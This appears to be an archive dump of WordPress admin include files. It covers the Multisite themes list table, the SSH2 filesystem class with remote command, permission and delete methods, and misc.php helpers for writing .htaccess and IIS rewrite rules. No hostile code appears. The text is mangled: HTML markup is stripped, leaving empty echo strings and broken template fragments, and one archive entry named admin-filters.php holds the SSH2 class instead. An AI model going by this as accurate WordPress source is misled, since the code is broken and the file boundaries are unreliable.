    ', $time_class, wp_get_auto_update_message() ); } $html = implode( '', $html ); /** * Filters the HTML of the auto-updates setting for each theme in the Themes list table. * * @since 5.5.0 * * @param string $html The HTML for theme's auto-update setting, including * toggle auto-update action link and time to next update. * @param string $stylesheet Directory name of the theme. * @param WP_Theme $theme WP_Theme object. */ echo apply_filters( 'theme_auto_update_setting_html', $html, $stylesheet, $theme ); wp_admin_notice( '', array( 'type' => 'error', 'additional_classes' => array( 'notice-alt', 'inline', 'hidden' ), ) ); } /** * Handles default column output. * * @since 4.3.0 * @since 5.9.0 Renamed `$theme` to `$item` to match parent class for PHP 8 named parameter support. * * @param WP_Theme $item The current WP_Theme object. * @param string $column_name The current column name. */ public function column_default( $item, $column_name ) { // Restores the more descriptive, specific name for use within this method. $theme = $item; $stylesheet = $theme->get_stylesheet(); /** * Fires inside each custom column of the Multisite themes list table. * * @since 3.1.0 * * @param string $column_name Name of the column. * @param string $stylesheet Directory name of the theme. * @param WP_Theme $theme Current WP_Theme object. */ do_action( 'manage_themes_custom_column', $column_name, $stylesheet, $theme ); } /** * Handles the output for a single table row. * * @since 4.3.0 * * @param WP_Theme $item The current WP_Theme object. */ public function single_row_columns( $item ) { list( $columns, $hidden, $sortable, $primary ) = $this->get_column_info(); foreach ( $columns as $column_name => $column_display_name ) { $extra_classes = ''; if ( in_array( $column_name, $hidden, true ) ) { $extra_classes .= ' hidden'; } switch ( $column_name ) { case 'cb': echo ''; $this->column_cb( $item ); echo ''; break; case 'name': $active_theme_label = ''; /* The presence of the site_id property means that this is a subsite view and a label for the active theme needs to be added */ if ( ! empty( $this->site_id ) ) { $stylesheet = get_blog_option( $this->site_id, 'stylesheet' ); $template = get_blog_option( $this->site_id, 'template' ); /* Add a label for the active template */ if ( $item->get_template() === $template ) { $active_theme_label = ' — ' . __( 'Active Theme' ); } /* In case this is a child theme, label it properly */ if ( $stylesheet !== $template && $item->get_stylesheet() === $stylesheet ) { $active_theme_label = ' — ' . __( 'Active Child Theme' ); } } echo "" . $item->display( 'Name' ) . $active_theme_label . ''; $this->column_name( $item ); echo ''; break; case 'description': echo ""; $this->column_description( $item ); echo ''; break; case 'auto-updates': echo ""; $this->column_autoupdates( $item ); echo ''; break; default: echo ""; $this->column_default( $item, $column_name ); echo ''; break; } } } /** * @global string $status * @global array $totals * * @param WP_Theme $theme */ public function single_row( $theme ) { global $status, $totals; if ( $this->is_site_themes ) { $allowed = $theme->is_allowed( 'site', $this->site_id ); } else { $allowed = $theme->is_allowed( 'network' ); } $stylesheet = $theme->get_stylesheet(); $class = ! $allowed ? 'inactive' : 'active'; if ( ! empty( $totals['upgrade'] ) && ! empty( $theme->update ) ) { $class .= ' update'; } printf( '', esc_attr( $class ), esc_attr( $stylesheet ) ); $this->single_row_columns( $theme ); echo ''; if ( $this->is_site_themes ) { remove_action( "after_theme_row_$stylesheet", 'wp_theme_update_row' ); } /** * Fires after each row in the Multisite themes list table. * * @since 3.1.0 * * @param string $stylesheet Directory name of the theme. * @param WP_Theme $theme Current WP_Theme object. * @param string $status Status of the theme. */ do_action( 'after_theme_row', $stylesheet, $theme, $status ); /** * Fires after each specific row in the Multisite themes list table. * * The dynamic portion of the hook name, `$stylesheet`, refers to the * directory name of the theme, most often synonymous with the template * name of the theme. * * @since 3.5.0 * * @param string $stylesheet Directory name of the theme. * @param WP_Theme $theme Current WP_Theme object. * @param string $status Status of the theme. */ do_action( "after_theme_row_{$stylesheet}", $stylesheet, $theme, $status ); } } includes/admin-filters.php000064400000017542152075237570011647 0ustar00method = 'ssh2'; $this->errors = new WP_Error(); // Check if possible to use ssh2 functions. if ( ! extension_loaded( 'ssh2' ) ) { $this->errors->add( 'no_ssh2_ext', __( 'The ssh2 PHP extension is not available' ) ); return; } // Set defaults: if ( empty( $opt['port'] ) ) { $this->options['port'] = 22; } else { $this->options['port'] = $opt['port']; } if ( empty( $opt['hostname'] ) ) { $this->errors->add( 'empty_hostname', __( 'SSH2 hostname is required' ) ); } else { $this->options['hostname'] = $opt['hostname']; } // Check if the options provided are OK. if ( ! empty( $opt['public_key'] ) && ! empty( $opt['private_key'] ) ) { $this->options['public_key'] = $opt['public_key']; $this->options['private_key'] = $opt['private_key']; $this->options['hostkey'] = array( 'hostkey' => 'ssh-rsa,ssh-ed25519' ); $this->keys = true; } elseif ( empty( $opt['username'] ) ) { $this->errors->add( 'empty_username', __( 'SSH2 username is required' ) ); } if ( ! empty( $opt['username'] ) ) { $this->options['username'] = $opt['username']; } if ( empty( $opt['password'] ) ) { // Password can be blank if we are using keys. if ( ! $this->keys ) { $this->errors->add( 'empty_password', __( 'SSH2 password is required' ) ); } else { $this->options['password'] = null; } } else { $this->options['password'] = $opt['password']; } } /** * Connects filesystem. * * @since 2.7.0 * * @return bool True on success, false on failure. */ public function connect() { if ( ! $this->keys ) { $this->link = @ssh2_connect( $this->options['hostname'], $this->options['port'] ); } else { $this->link = @ssh2_connect( $this->options['hostname'], $this->options['port'], $this->options['hostkey'] ); } if ( ! $this->link ) { $this->errors->add( 'connect', sprintf( /* translators: %s: hostname:port */ __( 'Failed to connect to SSH2 Server %s' ), $this->options['hostname'] . ':' . $this->options['port'] ) ); return false; } if ( ! $this->keys ) { if ( ! @ssh2_auth_password( $this->link, $this->options['username'], $this->options['password'] ) ) { $this->errors->add( 'auth', sprintf( /* translators: %s: Username. */ __( 'Username/Password incorrect for %s' ), $this->options['username'] ) ); return false; } } else { if ( ! @ssh2_auth_pubkey_file( $this->link, $this->options['username'], $this->options['public_key'], $this->options['private_key'], $this->options['password'] ) ) { $this->errors->add( 'auth', sprintf( /* translators: %s: Username. */ __( 'Public and Private keys incorrect for %s' ), $this->options['username'] ) ); return false; } } $this->sftp_link = ssh2_sftp( $this->link ); if ( ! $this->sftp_link ) { $this->errors->add( 'connect', sprintf( /* translators: %s: hostname:port */ __( 'Failed to initialize a SFTP subsystem session with the SSH2 Server %s' ), $this->options['hostname'] . ':' . $this->options['port'] ) ); return false; } return true; } /** * Gets the ssh2.sftp PHP stream wrapper path to open for the given file. * * This method also works around a PHP bug where the root directory (/) cannot * be opened by PHP functions, causing a false failure. In order to work around * this, the path is converted to /./ which is semantically the same as / * See https://bugs.php.net/bug.php?id=64169 for more details. * * @since 4.4.0 * * @param string $path The File/Directory path on the remote server to return * @return string The ssh2.sftp:// wrapped path to use. */ public function sftp_path( $path ) { if ( '/' === $path ) { $path = '/./'; } return 'ssh2.sftp://' . $this->sftp_link . '/' . ltrim( $path, '/' ); } /** * @since 2.7.0 * * @param string $command * @param bool $returnbool * @return bool|string True on success, false on failure. String if the command was executed, `$returnbool` * is false (default), and data from the resulting stream was retrieved. */ public function run_command( $command, $returnbool = false ) { if ( ! $this->link ) { return false; } $stream = ssh2_exec( $this->link, $command ); if ( ! $stream ) { $this->errors->add( 'command', sprintf( /* translators: %s: Command. */ __( 'Unable to perform command: %s' ), $command ) ); } else { stream_set_blocking( $stream, true ); stream_set_timeout( $stream, FS_TIMEOUT ); $data = stream_get_contents( $stream ); fclose( $stream ); if ( $returnbool ) { return ( false === $data ) ? false : '' !== trim( $data ); } else { return $data; } } return false; } /** * Reads entire file into a string. * * @since 2.7.0 * * @param string $file Name of the file to read. * @return string|false Read data on success, false if no temporary file could be opened, * or if the file couldn't be retrieved. */ public function get_contents( $file ) { return file_get_contents( $this->sftp_path( $file ) ); } /** * Reads entire file into an array. * * @since 2.7.0 * * @param string $file Path to the file. * @return array|false File contents in an array on success, false on failure. */ public function get_contents_array( $file ) { return file( $this->sftp_path( $file ) ); } /** * Writes a string to a file. * * @since 2.7.0 * * @param string $file Remote path to the file where to write the data. * @param string $contents The data to write. * @param int|false $mode Optional. The file permissions as octal number, usually 0644. * Default false. * @return bool True on success, false on failure. */ public function put_contents( $file, $contents, $mode = false ) { $ret = file_put_contents( $this->sftp_path( $file ), $contents ); if ( strlen( $contents ) !== $ret ) { return false; } $this->chmod( $file, $mode ); return true; } /** * Gets the current working directory. * * @since 2.7.0 * * @return string|false The current working directory on success, false on failure. */ public function cwd() { $cwd = ssh2_sftp_realpath( $this->sftp_link, '.' ); if ( $cwd ) { $cwd = trailingslashit( trim( $cwd ) ); } return $cwd; } /** * Changes current directory. * * @since 2.7.0 * * @param string $dir The new current directory. * @return bool True on success, false on failure. */ public function chdir( $dir ) { return $this->run_command( 'cd ' . $dir, true ); } /** * Changes the file group. * * @since 2.7.0 * * @param string $file Path to the file. * @param string|int $group A group name or number. * @param bool $recursive Optional. If set to true, changes file group recursively. * Default false. * @return bool True on success, false on failure. */ public function chgrp( $file, $group, $recursive = false ) { if ( ! $this->exists( $file ) ) { return false; } if ( ! $recursive || ! $this->is_dir( $file ) ) { return $this->run_command( sprintf( 'chgrp %s %s', escapeshellarg( $group ), escapeshellarg( $file ) ), true ); } return $this->run_command( sprintf( 'chgrp -R %s %s', escapeshellarg( $group ), escapeshellarg( $file ) ), true ); } /** * Changes filesystem permissions. * * @since 2.7.0 * * @param string $file Path to the file. * @param int|false $mode Optional. The permissions as octal number, usually 0644 for files, * 0755 for directories. Default false. * @param bool $recursive Optional. If set to true, changes file permissions recursively. * Default false. * @return bool True on success, false on failure. */ public function chmod( $file, $mode = false, $recursive = false ) { if ( ! $this->exists( $file ) ) { return false; } if ( ! $mode ) { if ( $this->is_file( $file ) ) { $mode = FS_CHMOD_FILE; } elseif ( $this->is_dir( $file ) ) { $mode = FS_CHMOD_DIR; } else { return false; } } if ( ! $recursive || ! $this->is_dir( $file ) ) { return $this->run_command( sprintf( 'chmod %o %s', $mode, escapeshellarg( $file ) ), true ); } return $this->run_command( sprintf( 'chmod -R %o %s', $mode, escapeshellarg( $file ) ), true ); } /** * Changes the owner of a file or directory. * * @since 2.7.0 * * @param string $file Path to the file or directory. * @param string|int $owner A user name or number. * @param bool $recursive Optional. If set to true, changes file owner recursively. * Default false. * @return bool True on success, false on failure. */ public function chown( $file, $owner, $recursive = false ) { if ( ! $this->exists( $file ) ) { return false; } if ( ! $recursive || ! $this->is_dir( $file ) ) { return $this->run_command( sprintf( 'chown %s %s', escapeshellarg( $owner ), escapeshellarg( $file ) ), true ); } return $this->run_command( sprintf( 'chown -R %s %s', escapeshellarg( $owner ), escapeshellarg( $file ) ), true ); } /** * Gets the file owner. * * @since 2.7.0 * * @param string $file Path to the file. * @return string|false Username of the owner on success, false on failure. */ public function owner( $file ) { $owneruid = @fileowner( $this->sftp_path( $file ) ); if ( ! $owneruid ) { return false; } if ( ! function_exists( 'posix_getpwuid' ) ) { return $owneruid; } $ownerarray = posix_getpwuid( $owneruid ); if ( ! $ownerarray ) { return false; } return $ownerarray['name']; } /** * Gets the permissions of the specified file or filepath in their octal format. * * @since 2.7.0 * * @param string $file Path to the file. * @return string Mode of the file (the last 3 digits). */ public function getchmod( $file ) { return substr( decoct( @fileperms( $this->sftp_path( $file ) ) ), -3 ); } /** * Gets the file's group. * * @since 2.7.0 * * @param string $file Path to the file. * @return string|false The group on success, false on failure. */ public function group( $file ) { $gid = @filegroup( $this->sftp_path( $file ) ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); if ( ! $grouparray ) { return false; } return $grouparray['name']; } /** * Copies a file. * * @since 2.7.0 * * @param string $source Path to the source file. * @param string $destination Path to the destination file. * @param bool $overwrite Optional. Whether to overwrite the destination file if it exists. * Default false. * @param int|false $mode Optional. The permissions as octal number, usually 0644 for files, * 0755 for dirs. Default false. * @return bool True on success, false on failure. */ public function copy( $source, $destination, $overwrite = false, $mode = false ) { if ( ! $overwrite && $this->exists( $destination ) ) { return false; } $content = $this->get_contents( $source ); if ( false === $content ) { return false; } return $this->put_contents( $destination, $content, $mode ); } /** * Moves a file or directory. * * After moving files or directories, OPcache will need to be invalidated. * * If moving a directory fails, `copy_dir()` can be used for a recursive copy. * * Use `move_dir()` for moving directories with OPcache invalidation and a * fallback to `copy_dir()`. * * @since 2.7.0 * * @param string $source Path to the source file or directory. * @param string $destination Path to the destination file or directory. * @param bool $overwrite Optional. Whether to overwrite the destination if it exists. * Default false. * @return bool True on success, false on failure. */ public function move( $source, $destination, $overwrite = false ) { if ( $this->exists( $destination ) ) { if ( $overwrite ) { // We need to remove the destination before we can rename the source. $this->delete( $destination, false, 'f' ); } else { // If we're not overwriting, the rename will fail, so return early. return false; } } return ssh2_sftp_rename( $this->sftp_link, $source, $destination ); } /** * Deletes a file or directory. * * @since 2.7.0 * * @param string $file Path to the file or directory. * @param bool $recursive Optional. If set to true, deletes files and folders recursively. * Default false. * @param string|false $type Type of resource. 'f' for file, 'd' for directory. * Default false. * @return bool True on success, false on failure. */ public function delete( $file, $recursive = false, $type = false ) { if ( 'f' === $type || $this->is_file( $file ) ) { return ssh2_sftp_unlink( $this->sftp_link, $file ); } if ( ! $recursive ) { return ssh2_sftp_rmdir( $this->sftp_link, $file ); } $filelist = $this->dirlist( $file ); if ( is_array( $filelist ) ) { foreach ( $filelist as $filename => $fileinfo ) { $this->delete( $file . '/' . $filename, $recursive, $fileinfo['type'] ); } } return ssh2_sftp_rmdir( $this->sftp_link, $file ); } /** * Checks if a file or directory exists. * * @since 2.7.0 * * @param string $path Path to file or directory. * @return bool Whether $path exists or not. */ public function exists( $path ) { return file_exists( $this->sftp_path( $path ) ); } /** * Checks if resource is a file. * * @since 2.7.0 * * @param string $file File path. * @return bool Whether $file is a file. */ public function is_file( $file ) { return is_file( $this->sftp_path( $file ) ); } /** * Checks if resource is a directory. * * @since 2.7.0 * * @param string $path Directory path. * @return bool Whether $path is a directory. */ public function is_dir( $path ) { return is_dir( $this->sftp_path( $path ) ); } /** * Checks if a file is readable. * * @since 2.7.0 * * @param string $file Path to file. * @return bool Whether $file is readable. */ public function is_readable( $file ) { return is_readable( $this->sftp_path( $file ) ); } /** * Checks if a file or directory is writable. * * @since 2.7.0 * * @param string $path Path to file or directory. * @return bool Whether $path is writable. */ public function is_writable( $path ) { // PHP will base its writable checks on system_user === file_owner, not ssh_user === file_owner. return true; } /** * Gets the file's last access time. * * @since 2.7.0 * * @param string $file Path to file. * @return int|false Unix timestamp representing last access time, false on failure. */ public function atime( $file ) { return fileatime( $this->sftp_path( $file ) ); } /** * Gets the file modification time. * * @since 2.7.0 * * @param string $file Path to file. * @return int|false Unix timestamp representing modification time, false on failure. */ public function mtime( $file ) { return filemtime( $this->sftp_path( $file ) ); } /** * Gets the file size (in bytes). * * @since 2.7.0 * * @param string $file Path to file. * @return int|false Size of the file in bytes on success, false on failure. */ public function size( $file ) { return filesize( $this->sftp_path( $file ) ); } /** * Sets the access and modification times of a file. * * Note: Not implemented. * * @since 2.7.0 * * @param string $file Path to file. * @param int $time Optional. Modified time to set for file. * Default 0. * @param int $atime Optional. Access time to set for file. * Default 0. */ public function touch( $file, $time = 0, $atime = 0 ) { // Not implemented. } /** * Creates a directory. * * @since 2.7.0 * * @param string $path Path for new directory. * @param int|false $chmod Optional. The permissions as octal number (or false to skip chmod). * Default false. * @param string|int|false $chown Optional. A user name or number (or false to skip chown). * Default false. * @param string|int|false $chgrp Optional. A group name or number (or false to skip chgrp). * Default false. * @return bool True on success, false on failure. */ public function mkdir( $path, $chmod = false, $chown = false, $chgrp = false ) { $path = untrailingslashit( $path ); if ( empty( $path ) ) { return false; } if ( ! $chmod ) { $chmod = FS_CHMOD_DIR; } if ( ! ssh2_sftp_mkdir( $this->sftp_link, $path, $chmod, true ) ) { return false; } // Set directory permissions. ssh2_sftp_chmod( $this->sftp_link, $path, $chmod ); if ( $chown ) { $this->chown( $path, $chown ); } if ( $chgrp ) { $this->chgrp( $path, $chgrp ); } return true; } /** * Deletes a directory. * * @since 2.7.0 * * @param string $path Path to directory. * @param bool $recursive Optional. Whether to recursively remove files/directories. * Default false. * @return bool True on success, false on failure. */ public function rmdir( $path, $recursive = false ) { return $this->delete( $path, $recursive ); } /** * Gets details for files in a directory or a specific file. * * @since 2.7.0 * * @param string $path Path to directory or file. * @param bool $include_hidden Optional. Whether to include details of hidden ("." prefixed) files. * Default true. * @param bool $recursive Optional. Whether to recursively include file details in nested directories. * Default false. * @return array|false { * Array of arrays containing file information. False if unable to list directory contents. * * @type array ...$0 { * Array of file information. Note that some elements may not be available on all filesystems. * * @type string $name Name of the file or directory. * @type string $perms *nix representation of permissions. * @type string $permsn Octal representation of permissions. * @type false $number File number. Always false in this context. * @type string|false $owner Owner name or ID, or false if not available. * @type string|false $group File permissions group, or false if not available. * @type int|string|false $size Size of file in bytes. May be a numeric string. * False if not available. * @type int|string|false $lastmodunix Last modified unix timestamp. May be a numeric string. * False if not available. * @type string|false $lastmod Last modified month (3 letters) and day (without leading 0), or * false if not available. * @type string|false $time Last modified time, or false if not available. * @type string $type Type of resource. 'f' for file, 'd' for directory, 'l' for link. * @type array|false $files If a directory and `$recursive` is true, contains another array of * files. False if unable to list directory contents. * } * } */ public function dirlist( $path, $include_hidden = true, $recursive = false ) { if ( $this->is_file( $path ) ) { $limit_file = basename( $path ); $path = dirname( $path ); } else { $limit_file = false; } if ( ! $this->is_dir( $path ) || ! $this->is_readable( $path ) ) { return false; } $ret = array(); $dir = dir( $this->sftp_path( $path ) ); if ( ! $dir ) { return false; } $path = trailingslashit( $path ); while ( false !== ( $entry = $dir->read() ) ) { $struc = array(); $struc['name'] = $entry; if ( '.' === $struc['name'] || '..' === $struc['name'] ) { continue; // Do not care about these folders. } if ( ! $include_hidden && '.' === $struc['name'][0] ) { continue; } if ( $limit_file && $struc['name'] !== $limit_file ) { continue; } $struc['perms'] = $this->gethchmod( $path . $entry ); $struc['permsn'] = $this->getnumchmodfromh( $struc['perms'] ); $struc['number'] = false; $struc['owner'] = $this->owner( $path . $entry ); $struc['group'] = $this->group( $path . $entry ); $struc['size'] = $this->size( $path . $entry ); $struc['lastmodunix'] = $this->mtime( $path . $entry ); $struc['lastmod'] = gmdate( 'M j', $struc['lastmodunix'] ); $struc['time'] = gmdate( 'h:i:s', $struc['lastmodunix'] ); $struc['type'] = $this->is_dir( $path . $entry ) ? 'd' : 'f'; if ( 'd' === $struc['type'] ) { if ( $recursive ) { $struc['files'] = $this->dirlist( $path . $struc['name'], $include_hidden, $recursive ); } else { $struc['files'] = array(); } } $ret[ $struc['name'] ] = $struc; } $dir->close(); unset( $dir ); return $ret; } } includes/misc.php000064400000131354152075237570010042 0ustar00 $text ) { $instructions[ $line ] = '# ' . $text; } /** * Filters the inline instructions inserted before the dynamically generated content. * * @since 5.3.0 * * @param string[] $instructions Array of lines with inline instructions. * @param string $marker The marker being inserted. */ $instructions = apply_filters( 'insert_with_markers_inline_instructions', $instructions, $marker ); if ( $switched_locale ) { restore_previous_locale(); } $insertion = array_merge( $instructions, $insertion ); $start_marker = "# BEGIN {$marker}"; $end_marker = "# END {$marker}"; $fp = fopen( $filename, 'r+' ); if ( ! $fp ) { return false; } // Attempt to get a lock. If the filesystem supports locking, this will block until the lock is acquired. flock( $fp, LOCK_EX ); $lines = array(); while ( ! feof( $fp ) ) { $lines[] = rtrim( fgets( $fp ), "\r\n" ); } // Split out the existing file into the preceding lines, and those that appear after the marker. $pre_lines = array(); $post_lines = array(); $existing_lines = array(); $found_marker = false; $found_end_marker = false; foreach ( $lines as $line ) { if ( ! $found_marker && str_contains( $line, $start_marker ) ) { $found_marker = true; continue; } elseif ( ! $found_end_marker && str_contains( $line, $end_marker ) ) { $found_end_marker = true; continue; } if ( ! $found_marker ) { $pre_lines[] = $line; } elseif ( $found_end_marker ) { $post_lines[] = $line; } else { $existing_lines[] = $line; } } // Check to see if there was a change. if ( $existing_lines === $insertion ) { flock( $fp, LOCK_UN ); fclose( $fp ); return true; } // Generate the new file data. $new_file_data = implode( "\n", array_merge( $pre_lines, array( $start_marker ), $insertion, array( $end_marker ), $post_lines ) ); // Write to the start of the file, and truncate it to that length. fseek( $fp, 0 ); $bytes = fwrite( $fp, $new_file_data ); if ( $bytes ) { ftruncate( $fp, ftell( $fp ) ); } fflush( $fp ); flock( $fp, LOCK_UN ); fclose( $fp ); return (bool) $bytes; } /** * Updates the htaccess file with the current rules if it is writable. * * Always writes to the file if it exists and is writable to ensure that we * blank out old rules. * * @since 1.5.0 * * @global WP_Rewrite $wp_rewrite WordPress rewrite component. * * @return bool|null True on write success, false on failure. Null in multisite. */ function save_mod_rewrite_rules() { global $wp_rewrite; if ( is_multisite() ) { return null; } // Ensure get_home_path() is declared. require_once ABSPATH . 'wp-admin/includes/file.php'; $home_path = get_home_path(); $htaccess_file = $home_path . '.htaccess'; /* * If the file doesn't already exist check for write access to the directory * and whether we have some rules. Else check for write access to the file. */ if ( ! file_exists( $htaccess_file ) && is_writable( $home_path ) && $wp_rewrite->using_mod_rewrite_permalinks() || is_writable( $htaccess_file ) ) { if ( got_mod_rewrite() ) { $rules = explode( "\n", $wp_rewrite->mod_rewrite_rules() ); return insert_with_markers( $htaccess_file, 'WordPress', $rules ); } } return false; } /** * Updates the IIS web.config file with the current rules if it is writable. * If the permalinks do not require rewrite rules then the rules are deleted from the web.config file. * * @since 2.8.0 * * @global WP_Rewrite $wp_rewrite WordPress rewrite component. * * @return bool|null True on write success, false on failure. Null in multisite. */ function iis7_save_url_rewrite_rules() { global $wp_rewrite; if ( is_multisite() ) { return null; } // Ensure get_home_path() is declared. require_once ABSPATH . 'wp-admin/includes/file.php'; $home_path = get_home_path(); $web_config_file = $home_path . 'web.config'; // Using win_is_writable() instead of is_writable() because of a bug in Windows PHP. if ( iis7_supports_permalinks() && ( ! file_exists( $web_config_file ) && win_is_writable( $home_path ) && $wp_rewrite->using_mod_rewrite_permalinks() || win_is_writable( $web_config_file ) ) ) { $rule = $wp_rewrite->iis7_url_rewrite_rules( false ); if ( ! empty( $rule ) ) { return iis7_add_rewrite_rule( $web_config_file, $rule ); } else { return iis7_delete_rewrite_rule( $web_config_file ); } } return false; } /** * Updates the "recently-edited" file for the plugin or theme file editor. * * @since 1.5.0 * * @param string $file */ function update_recently_edited( $file ) { $oldfiles = (array) get_option( 'recently_edited' ); if ( $oldfiles ) { $oldfiles = array_reverse( $oldfiles ); $oldfiles[] = $file; $oldfiles = array_reverse( $oldfiles ); $oldfiles = array_unique( $oldfiles ); if ( 5 < count( $oldfiles ) ) { array_pop( $oldfiles ); } } else { $oldfiles[] = $file; } update_option( 'recently_edited', $oldfiles ); } /** * Makes a tree structure for the theme file editor's file list. * * @since 4.9.0 * @access private * * @param array $allowed_files List of theme file paths. * @return array Tree structure for listing theme files. */ function wp_make_theme_file_tree( $allowed_files ) { $tree_list = array(); foreach ( $allowed_files as $file_name => $absolute_filename ) { $list = explode( '/', $file_name ); $last_dir = &$tree_list; foreach ( $list as $dir ) { $last_dir =& $last_dir[ $dir ]; } $last_dir = $file_name; } return $tree_list; } /** * Outputs the formatted file list for the theme file editor. * * @since 4.9.0 * @access private * * @global string $relative_file Name of the file being edited relative to the * theme directory. * @global string $stylesheet The stylesheet name of the theme being edited. * * @param array|string $tree List of file/folder paths, or filename. * @param int $level The aria-level for the current iteration. * @param int $size The aria-setsize for the current iteration. * @param int $index The aria-posinset for the current iteration. */ function wp_print_theme_file_tree( $tree, $level = 2, $size = 1, $index = 1 ) { global $relative_file, $stylesheet; if ( is_array( $tree ) ) { $index = 0; $size = count( $tree ); foreach ( $tree as $label => $theme_file ) : ++$index; if ( ! is_array( $theme_file ) ) { wp_print_theme_file_tree( $theme_file, $level, $index, $size ); continue; } ?>
    • rawurlencode( $tree ), 'theme' => rawurlencode( $stylesheet ), ), self_admin_url( 'theme-editor.php' ) ); ?>
  • (' . esc_html( $filename ) . ')'; } if ( $relative_file === $filename ) { echo '' . $file_description . ''; } else { echo $file_description; } ?>
    • $plugin_file ) : ++$index; if ( ! is_array( $plugin_file ) ) { wp_print_plugin_file_tree( $plugin_file, $label, $level, $index, $size ); continue; } ?>
    • rawurlencode( $tree ), 'plugin' => rawurlencode( $plugin ), ), self_admin_url( 'plugin-editor.php' ) ); ?>
  • ' . esc_html( $label ) . ''; } else { echo esc_html( $label ); } ?>
    • get_error_data() && is_string( $message->get_error_data() ) ) { $message = $message->get_error_message() . ': ' . $message->get_error_data(); } else { $message = $message->get_error_message(); } } echo "

    $message

    \n"; wp_ob_end_flush_all(); flush(); } /** * @since 2.8.0 * * @param string $content * @return string[] Array of function names. */ function wp_doc_link_parse( $content ) { if ( ! is_string( $content ) || empty( $content ) ) { return array(); } if ( ! function_exists( 'token_get_all' ) ) { return array(); } $tokens = token_get_all( $content ); $count = count( $tokens ); $functions = array(); $ignore_functions = array(); for ( $t = 0; $t < $count - 2; $t++ ) { if ( ! is_array( $tokens[ $t ] ) ) { continue; } if ( T_STRING === $tokens[ $t ][0] && ( '(' === $tokens[ $t + 1 ] || '(' === $tokens[ $t + 2 ] ) ) { // If it's a function or class defined locally, there's not going to be any docs available. if ( ( isset( $tokens[ $t - 2 ][1] ) && in_array( $tokens[ $t - 2 ][1], array( 'function', 'class' ), true ) ) || ( isset( $tokens[ $t - 2 ][0] ) && T_OBJECT_OPERATOR === $tokens[ $t - 1 ][0] ) ) { $ignore_functions[] = $tokens[ $t ][1]; } // Add this to our stack of unique references. $functions[] = $tokens[ $t ][1]; } } $functions = array_unique( $functions ); sort( $functions ); /** * Filters the list of functions and classes to be ignored from the documentation lookup. * * @since 2.8.0 * * @param string[] $ignore_functions Array of names of functions and classes to be ignored. */ $ignore_functions = apply_filters( 'documentation_ignore_functions', $ignore_functions ); $ignore_functions = array_unique( $ignore_functions ); $output = array(); foreach ( $functions as $function ) { if ( in_array( $function, $ignore_functions, true ) ) { continue; } $output[] = $function; } return $output; } /** * Saves option for number of rows when listing posts, pages, comments, etc. * * @since 2.8.0 */ function set_screen_options() { if ( ! isset( $_POST['wp_screen_options'] ) || ! is_array( $_POST['wp_screen_options'] ) ) { return; } check_admin_referer( 'screen-options-nonce', 'screenoptionnonce' ); $user = wp_get_current_user(); if ( ! $user ) { return; } $option = $_POST['wp_screen_options']['option']; $value = $_POST['wp_screen_options']['value']; if ( sanitize_key( $option ) !== $option ) { return; } $map_option = $option; $type = str_replace( 'edit_', '', $map_option ); $type = str_replace( '_per_page', '', $type ); if ( in_array( $type, get_taxonomies(), true ) ) { $map_option = 'edit_tags_per_page'; } elseif ( in_array( $type, get_post_types(), true ) ) { $map_option = 'edit_per_page'; } else { $option = str_replace( '-', '_', $option ); } switch ( $map_option ) { case 'edit_per_page': case 'users_per_page': case 'edit_comments_per_page': case 'upload_per_page': case 'edit_tags_per_page': case 'plugins_per_page': case 'export_personal_data_requests_per_page': case 'remove_personal_data_requests_per_page': // Network admin. case 'sites_network_per_page': case 'users_network_per_page': case 'site_users_network_per_page': case 'plugins_network_per_page': case 'themes_network_per_page': case 'site_themes_network_per_page': $value = (int) $value; if ( $value < 1 || $value > 999 ) { return; } break; default: $screen_option = false; if ( str_ends_with( $option, '_page' ) || 'layout_columns' === $option ) { /** * Filters a screen option value before it is set. * * The filter can also be used to modify non-standard `[items]_per_page` * settings. See the parent function for a full list of standard options. * * Returning false from the filter will skip saving the current option. * * @since 2.8.0 * @since 5.4.2 Only applied to options ending with '_page', * or the 'layout_columns' option. * * @see set_screen_options() * * @param mixed $screen_option The value to save instead of the option value. * Default false (to skip saving the current option). * @param string $option The option name. * @param int $value The option value. */ $screen_option = apply_filters( 'set-screen-option', $screen_option, $option, $value ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores } /** * Filters a screen option value before it is set. * * The dynamic portion of the hook name, `$option`, refers to the option name. * * Returning false from the filter will skip saving the current option. * * @since 5.4.2 * * @see set_screen_options() * * @param mixed $screen_option The value to save instead of the option value. * Default false (to skip saving the current option). * @param string $option The option name. * @param int $value The option value. */ $value = apply_filters( "set_screen_option_{$option}", $screen_option, $option, $value ); if ( false === $value ) { return; } break; } update_user_meta( $user->ID, $option, $value ); $url = remove_query_arg( array( 'pagenum', 'apage', 'paged' ), wp_get_referer() ); if ( isset( $_POST['mode'] ) ) { $url = add_query_arg( array( 'mode' => $_POST['mode'] ), $url ); } wp_safe_redirect( $url ); exit; } /** * Checks if rewrite rule for WordPress already exists in the IIS 7+ configuration file. * * @since 2.8.0 * * @param string $filename The file path to the configuration file. * @return bool */ function iis7_rewrite_rule_exists( $filename ) { if ( ! file_exists( $filename ) ) { return false; } if ( ! class_exists( 'DOMDocument', false ) ) { return false; } $doc = new DOMDocument(); if ( $doc->load( $filename ) === false ) { return false; } $xpath = new DOMXPath( $doc ); $rules = $xpath->query( '/configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'wordpress\')] | /configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'WordPress\')]' ); if ( 0 === $rules->length ) { return false; } return true; } /** * Deletes WordPress rewrite rule from web.config file if it exists there. * * @since 2.8.0 * * @param string $filename Name of the configuration file. * @return bool */ function iis7_delete_rewrite_rule( $filename ) { // If configuration file does not exist then rules also do not exist, so there is nothing to delete. if ( ! file_exists( $filename ) ) { return true; } if ( ! class_exists( 'DOMDocument', false ) ) { return false; } $doc = new DOMDocument(); $doc->preserveWhiteSpace = false; if ( $doc->load( $filename ) === false ) { return false; } $xpath = new DOMXPath( $doc ); $rules = $xpath->query( '/configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'wordpress\')] | /configuration/system.webServer/rewrite/rules/rule[starts-with(@name,\'WordPress\')]' ); if ( $rules->length > 0 ) { $child = $rules->item( 0 ); $parent = $child->parentNode; $parent->removeChild( $child ); $doc->formatOutput = true; saveDomDocument( $doc, $filename ); } return true; } /** * Adds WordPress rewrite rule to the IIS 7+ configuration file. * * @since 2.8.0 * * @param string $filename The file path to the configuration file. * @param string $rewrite_rule The XML fragment with URL Rewrite rule. * @return bool */ function 